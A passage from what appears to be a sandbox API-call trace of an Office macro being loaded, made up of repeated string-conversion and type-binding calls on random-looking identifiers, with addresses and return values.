dwFlags=0x0, lpMultiByteStr=0x5798180, cbMultiByte=7, lpWideCharStr=0x45412d0, cchWideChar=16 | out: lpWideCharStr="BUhKfda") returned 7 [0023.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579818e, cbMultiByte=7, lpWideCharStr=0x45413e8, cchWideChar=16 | out: lpWideCharStr="CnswDUA") returned 7 [0023.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579819c, cbMultiByte=11, lpWideCharStr=0x4541500, cchWideChar=24 | out: lpWideCharStr="zUXuKYSfFxX") returned 11 [0023.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27f2, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="ySmvTnEbFS") returned 11 [0023.165] ITypeComp:RemoteBind (in: This=0x2876550, szName="ySmvTnEbFS", lHashVal=0x108a9c, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x238 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x238) returned 0x0 [0023.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27f2, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="ySmvTnEbFS") returned 11 [0023.166] ITypeComp:RemoteBind (in: This=0x2875638, szName="ySmvTnEbFS", lHashVal=0x108a9c, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x238 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x238) returned 0x0 [0023.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27f2, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="ySmvTnEbFS") returned 11 [0023.166] ITypeComp:RemoteBind (in: This=0x2876778, szName="ySmvTnEbFS", lHashVal=0x108a9c, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x238 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x238) returned 0x0 [0023.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27f2, cbMultiByte=11, lpWideCharStr=0x125364, cchWideChar=12 | out: lpWideCharStr="ySmvTnEbFS") returned 11 [0023.166] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="ySmvTnEbFS", lHashVal=0x108a9c, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x238 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x238) returned 0x0 [0023.166] CRetailMalloc_Alloc () returned 0x78b2f90 [0023.166] IUnknown:Release (This=0x2876548) returned 0x5 [0023.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2efe, cbMultiByte=18, lpWideCharStr=0x125374, cchWideChar=19 | out: lpWideCharStr="_B_var_ySmvTnEbFS") returned 18 [0023.166] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_ySmvTnEbFS", lHashVal=0x10f906, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.166] CRetailMalloc_Free () returned 0x1ba0201 [0023.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57981b4, cbMultiByte=10, lpWideCharStr=0x45417b4, cchWideChar=22 | out: lpWideCharStr="FxfzBuZhcs") returned 10 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57981c2, cbMultiByte=11, lpWideCharStr=0x4541806, cchWideChar=24 | out: lpWideCharStr="DwTyMsShaDd") returned 11 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57981d4, cbMultiByte=7, lpWideCharStr=0x4541892, cchWideChar=16 | out: lpWideCharStr="VeXfLaK") returned 7 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57981e2, cbMultiByte=11, lpWideCharStr=0x45419aa, cchWideChar=24 | out: lpWideCharStr="TNZvPrwxXvD") returned 11 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57981f4, cbMultiByte=7, lpWideCharStr=0x4541aca, cchWideChar=16 | out: lpWideCharStr="VyyRRbg") returned 7 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798202, cbMultiByte=7, lpWideCharStr=0x4541be2, cchWideChar=16 | out: lpWideCharStr="RftYgZS") returned 7 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798210, cbMultiByte=10, lpWideCharStr=0x4541cfa, cchWideChar=22 | out: lpWideCharStr="BAxWvmcreT") returned 10 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f281a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="TFFystv") returned 8 [0023.167] ITypeComp:RemoteBind (in: This=0x2876550, szName="TFFystv", lHashVal=0x10474a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x23a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x23a) returned 0x0 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f281a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="TFFystv") returned 8 [0023.167] ITypeComp:RemoteBind (in: This=0x2875638, szName="TFFystv", lHashVal=0x10474a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x23a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x23a) returned 0x0 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f281a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="TFFystv") returned 8 [0023.167] ITypeComp:RemoteBind (in: This=0x2876778, szName="TFFystv", lHashVal=0x10474a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x23a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x23a) returned 0x0 [0023.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f281a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="TFFystv") returned 8 [0023.167] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="TFFystv", lHashVal=0x10474a, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x23a | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x23a) returned 0x0 [0023.168] CRetailMalloc_Alloc () returned 0x786b818 [0023.168] IUnknown:Release (This=0x2876548) returned 0x5 [0023.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2f2e, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_TFFystv") returned 15 [0023.168] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_TFFystv", lHashVal=0x104ace, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.168] CRetailMalloc_Free () returned 0xef90001 [0023.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798228, cbMultiByte=7, lpWideCharStr=0x4541f88, cchWideChar=16 | out: lpWideCharStr="MkYHprk") returned 7 [0023.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798234, cbMultiByte=11, lpWideCharStr=0x4541fd4, cchWideChar=24 | out: lpWideCharStr="ecZfRBdCmmM") returned 11 [0023.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798246, cbMultiByte=8, lpWideCharStr=0x4542060, cchWideChar=18 | out: lpWideCharStr="fFFVeEfC") returned 8 [0023.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798254, cbMultiByte=8, lpWideCharStr=0x454217a, cchWideChar=18 | out: lpWideCharStr="ELWEXuUw") returned 8 [0023.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798262, cbMultiByte=7, lpWideCharStr=0x4542294, cchWideChar=16 | out: lpWideCharStr="rtkCUtp") returned 7 [0023.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798270, cbMultiByte=7, lpWideCharStr=0x45423ac, cchWideChar=16 | out: lpWideCharStr="MPxbtAz") returned 7 [0023.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579827e, cbMultiByte=11, lpWideCharStr=0x45424c4, cchWideChar=24 | out: lpWideCharStr="wTXBvaZusmZ") returned 11 [0023.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798290, cbMultiByte=7, lpWideCharStr=0x45425e4, cchWideChar=16 | out: lpWideCharStr="WAGGhmt") returned 7 [0023.169] CRetailMalloc_Alloc () returned 0x56cc898 [0023.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27ce, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ZFktLfW") returned 8 [0023.169] ITypeComp:RemoteBind (in: This=0x2876550, szName="ZFktLfW", lHashVal=0x10b25f, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x236 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x236) returned 0x0 [0023.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27ce, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ZFktLfW") returned 8 [0023.169] ITypeComp:RemoteBind (in: This=0x2875638, szName="ZFktLfW", lHashVal=0x10b25f, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x236 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x236) returned 0x0 [0023.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27ce, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ZFktLfW") returned 8 [0023.169] ITypeComp:RemoteBind (in: This=0x2876778, szName="ZFktLfW", lHashVal=0x10b25f, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x236 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x236) returned 0x0 [0023.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f27ce, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="ZFktLfW") returned 8 [0023.169] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="ZFktLfW", lHashVal=0x10b25f, wFlags=0x5, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x236 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x236) returned 0x0 [0023.169] CRetailMalloc_Alloc () returned 0x786b818 [0023.170] IUnknown:Release (This=0x2876548) returned 0x5 [0023.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2f5a, cbMultiByte=15, lpWideCharStr=0x125374, cchWideChar=16 | out: lpWideCharStr="_B_var_ZFktLfW") returned 15 [0023.170] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_ZFktLfW", lHashVal=0x10a662, wFlags=0x5, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.170] CRetailMalloc_Free () returned 0xef90001 [0023.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57982a4, cbMultiByte=9, lpWideCharStr=0x4543810, cchWideChar=20 | out: lpWideCharStr="CtRSuxRLK") returned 9 [0023.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57982b2, cbMultiByte=8, lpWideCharStr=0x4543860, cchWideChar=18 | out: lpWideCharStr="uZkbYfSR") returned 8 [0023.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57982c0, cbMultiByte=9, lpWideCharStr=0x45438e6, cchWideChar=20 | out: lpWideCharStr="dNXkYwKpF") returned 9 [0023.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57982d0, cbMultiByte=9, lpWideCharStr=0x4543a82, cchWideChar=20 | out: lpWideCharStr="sVKWfWytZ") returned 9 [0023.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57982e0, cbMultiByte=8, lpWideCharStr=0x4543b9e, cchWideChar=18 | out: lpWideCharStr="fMaBeHVu") returned 8 [0023.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57982ee, cbMultiByte=11, lpWideCharStr=0x4543cb8, cchWideChar=24 | out: lpWideCharStr="UTAaUgZtTXA") returned 11 [0023.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798300, cbMultiByte=10, lpWideCharStr=0x4543dd8, cchWideChar=22 | out: lpWideCharStr="cLeaWVWhsp") returned 10 [0023.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2866, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="PePbMHYCp") returned 10 [0023.170] ITypeComp:RemoteBind (in: This=0x2876550, szName="PePbMHYCp", lHashVal=0x107843, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x23e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x23e) returned 0x0 [0023.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2866, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="PePbMHYCp") returned 10 [0023.171] ITypeComp:RemoteBind (in: This=0x2875638, szName="PePbMHYCp", lHashVal=0x107843, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x23e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x23e) returned 0x0 [0023.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2866, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="PePbMHYCp") returned 10 [0023.171] ITypeComp:RemoteBind (in: This=0x2876778, szName="PePbMHYCp", lHashVal=0x107843, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x23e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x23e) returned 0x0 [0023.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2866, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="PePbMHYCp") returned 10 [0023.171] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="PePbMHYCp", lHashVal=0x107843, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x23e | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x23e) returned 0x0 [0023.171] CRetailMalloc_Alloc () returned 0x78b2f90 [0023.171] IUnknown:Release (This=0x2876548) returned 0x5 [0023.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2f86, cbMultiByte=17, lpWideCharStr=0x125374, cchWideChar=18 | out: lpWideCharStr="_B_var_PePbMHYCp") returned 17 [0023.171] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_PePbMHYCp", lHashVal=0x108188, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.171] CRetailMalloc_Free () returned 0x1ba0201 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798316, cbMultiByte=7, lpWideCharStr=0x4550098, cchWideChar=16 | out: lpWideCharStr="fyGPBHu") returned 7 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798322, cbMultiByte=7, lpWideCharStr=0x45500e4, cchWideChar=16 | out: lpWideCharStr="MxCTZzP") returned 7 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798330, cbMultiByte=10, lpWideCharStr=0x4550168, cchWideChar=22 | out: lpWideCharStr="NEReWKHDRh") returned 10 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798340, cbMultiByte=9, lpWideCharStr=0x4550286, cchWideChar=20 | out: lpWideCharStr="wPNnDsYUV") returned 9 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798350, cbMultiByte=7, lpWideCharStr=0x45503a2, cchWideChar=16 | out: lpWideCharStr="hyrmXrE") returned 7 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579835e, cbMultiByte=11, lpWideCharStr=0x45504ba, cchWideChar=24 | out: lpWideCharStr="TwTFWUvnKYk") returned 11 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798370, cbMultiByte=8, lpWideCharStr=0x45505da, cchWideChar=18 | out: lpWideCharStr="rsuLVGRZ") returned 8 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f288e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="tZBPeMgZgmb") returned 12 [0023.172] ITypeComp:RemoteBind (in: This=0x2876550, szName="tZBPeMgZgmb", lHashVal=0x10e75d, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x240 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x240) returned 0x0 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f288e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="tZBPeMgZgmb") returned 12 [0023.172] ITypeComp:RemoteBind (in: This=0x2875638, szName="tZBPeMgZgmb", lHashVal=0x10e75d, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x240 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x240) returned 0x0 [0023.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f288e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="tZBPeMgZgmb") returned 12 [0023.172] ITypeComp:RemoteBind (in: This=0x2876778, szName="tZBPeMgZgmb", lHashVal=0x10e75d, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x240 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x240) returned 0x0 [0023.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f288e, cbMultiByte=12, lpWideCharStr=0x125364, cchWideChar=13 | out: lpWideCharStr="tZBPeMgZgmb") returned 12 [0023.173] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="tZBPeMgZgmb", lHashVal=0x10e75d, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x240 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x240) returned 0x0 [0023.173] CRetailMalloc_Alloc () returned 0x78b3090 [0023.173] IUnknown:Release (This=0x2876548) returned 0x5 [0023.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2fb6, cbMultiByte=19, lpWideCharStr=0x125374, cchWideChar=20 | out: lpWideCharStr="_B_var_tZBPeMgZgmb") returned 19 [0023.173] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_tZBPeMgZgmb", lHashVal=0x10c93e, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.173] CRetailMalloc_Free () returned 0x1b20201 [0023.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798386, cbMultiByte=11, lpWideCharStr=0x4550864, cchWideChar=24 | out: lpWideCharStr="YzNgyKmzvRx") returned 11 [0023.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5798396, cbMultiByte=8, lpWideCharStr=0x45508b8, cchWideChar=18 | out: lpWideCharStr="CsUZzDXw") returned 8 [0023.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57983a4, cbMultiByte=8, lpWideCharStr=0x455093e, cchWideChar=18 | out: lpWideCharStr="ZMKYFckG") returned 8 [0023.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57983b2, cbMultiByte=11, lpWideCharStr=0x4550a58, cchWideChar=24 | out: lpWideCharStr="DXWTRRnCLht") returned 11 [0023.173] CRetailMalloc_Alloc () returned 0x56cd138 [0023.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57983c4, cbMultiByte=8, lpWideCharStr=0x4550b78, cchWideChar=18 | out: lpWideCharStr="mUHPVdbM") returned 8 [0023.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57983d2, cbMultiByte=11, lpWideCharStr=0x4550c92, cchWideChar=24 | out: lpWideCharStr="YKVSwncRTRp") returned 11 [0023.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57983e4, cbMultiByte=9, lpWideCharStr=0x4550db2, cchWideChar=20 | out: lpWideCharStr="KtGHVZbPV") returned 9 [0023.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f28b6, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="LdSYNHb") returned 8 [0023.174] ITypeComp:RemoteBind (in: This=0x2876550, szName="LdSYNHb", lHashVal=0x1077bc, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x242 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x242) returned 0x0 [0023.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f28b6, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="LdSYNHb") returned 8 [0023.174] ITypeComp:RemoteBind (in: This=0x2875638, szName="LdSYNHb", lHashVal=0x1077bc, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x242 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x242) returned 0x0 [0023.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f28b6, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="LdSYNHb") returned 8 [0023.174] ITypeComp:RemoteBind (in: This=0x2876778, szName="LdSYNHb", lHashVal=0x1077bc, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x242 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x242) returned 0x0 [0023.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f28b6, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="LdSYNHb") returned 8 [0023.175] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="LdSYNHb", lHashVal=0x1077bc, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x242 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, 